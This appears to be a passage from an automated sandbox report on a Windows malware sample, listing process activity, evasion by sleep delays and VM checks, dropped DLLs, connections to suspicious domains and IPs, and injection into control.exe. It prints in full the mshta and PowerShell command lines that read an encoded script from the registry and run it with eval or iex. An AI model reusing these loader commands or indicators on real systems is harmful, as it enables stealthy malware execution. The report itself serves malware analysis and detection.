            Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084 | Thread sleep time: -1773297476s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084 | Thread sleep count: 799 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612 | Thread sleep count: 6259 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676 | Thread sleep count: 2927 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620 | Thread sleep time: -19369081277395017s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648 | Thread sleep count: 6479 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704 | Thread sleep count: 2798 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 452 | Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224 | Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152 | Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 390
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 799
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 1425
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 506
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 1129
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 1555
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 870
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 862
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6259
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2927
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6479
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2798
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1803
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6739
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2705
            Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWh4[
            Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914184707.0000000000FA1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW-b^u
            Source: mshta.exe, 00000016.00000003.382843473.000001823555B000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7p
            Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.523272114.000000000130A000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
            Source: rundll32.exe, 00000004.00000003.811718040.0000000000F5A000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW@
            Source: mshta.exe, 00000017.00000002.390538379.000002B5EF59B000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: berukoneru.website
            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 79.110.52.144 187
            Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: windows.update3.com
            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 18.219.227.107 187
            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 3.12.124.139 187
            Maps a DLL or memory area into another process
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: unknown protection: execute and read and write
            Writes to foreign memory regions
            Source: C:\Windows\System32\loaddll32.exe | Memory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0
            Source: C:\Windows\System32\loaddll32.exe | Memory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3472
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3472
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3472
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: unknown EIP: 9B851580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: unknown EIP: 9B851580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: unknown EIP: 9B851580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: unknown EIP: 9B851580
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
